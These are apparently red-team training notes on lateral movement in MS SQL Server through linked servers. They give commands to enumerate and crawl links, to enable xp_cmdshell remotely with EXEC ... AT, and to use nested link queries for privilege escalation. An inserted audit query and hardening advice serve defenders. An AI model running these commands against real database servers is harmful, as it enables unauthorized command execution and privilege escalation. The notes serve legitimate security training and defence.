MS SQL Lateral Movement

SELECT srvname, srvproduct, rpcout FROM master..sysservers;
EXEC sp_linkedservers

This lists the configured links, for example one to sql-1.cyberbotic.io; the rpcout column shows whether RPC Out is enabled on the link, which EXEC ... AT requires.

Crawl linked servers using the PowerUpSQL module

powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

Enable xp_cmdshell on linked server

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]

Get linked server details

Get-SQLServerLink -Instance sql11 -Verbose

DatabaseLinkName       : SQL27
DatabaseLinkLocation   : Remote
Product                : SQL Server
Provider               : SQLNCLI
LocalLogin             : webapp11
RemoteLoginName        : webappGroup

In this case, the local login 'webapp11' has access to the linked server SQL27, and its remote login name will be 'webappGroup'.

Come home to me

SQL server links are not bidirectional by default

Execute a query on dc01 and, inside that query, use the link again to execute a query on appsrv01.

With nested AT commands, a query run from appsrv01 goes to the linked server dc01, which in turn runs it on its own link back to appsrv01.

It is also important to notice the use of single quotes in the SQL query. Every embedded single quote has to be escaped with another single quote at each nesting level, which means the innermost string (show advanced options) needs four single quotes.
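As an added audit query (not part of the original notes), the T-SQL below inventories from the defender's side exactly what the notes above rely on: the linked servers, their login mappings (the LocalLogin / RemoteLoginName shown earlier), whether RPC Out is on, and whether xp_cmdshell is enabled locally and on the link. [sql-1.cyberbotic.io] is the link name used above; the remote check reuses the doubled-quote rule just described.

```sql
-- Added audit query, not from the original notes. Run on the instance
-- being reviewed (e.g. sql-2) with VIEW ANY DEFINITION or sysadmin rights.

-- 1. Linked servers and how local logins are mapped across them.
SELECT s.name                AS link_name,
       s.product,
       s.provider,
       s.data_source,
       s.is_rpc_out_enabled,                   -- 1 = EXEC ... AT will work
       ll.local_principal_id,                  -- 0 = default mapping for all logins
       sp.name               AS local_login,   -- NULL when the row is the default mapping
       ll.uses_self_credential,                -- 1 = impersonate the calling login
       ll.remote_name        AS remote_login   -- fixed remote login, if one is set
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS ll ON ll.server_id    = s.server_id
LEFT JOIN sys.server_principals AS sp ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;

-- 2. Is xp_cmdshell (and the option that unlocks it) enabled on this instance?
--    value_in_use = 1 means enabled.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 3. Same check on the linked server. The inner string is sent over the
--    link, so its single quotes are doubled, as explained above.
EXEC('SELECT name, value_in_use
      FROM sys.configurations
      WHERE name IN (''show advanced options'', ''xp_cmdshell'');')
  AT [sql-1.cyberbotic.io];
```

A link with is_rpc_out_enabled = 1 and a fixed remote_login that is privileged on the remote side is the combination the notes above depend on; removing RPC Out or the fixed mapping, and leaving xp_cmdshell at 0, closes it.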

Add SA2 user for easy access to database 1

If no other privilege escalation paths are possible, we may be able to use a bidirectional link to elevate privileges on the same SQL server.
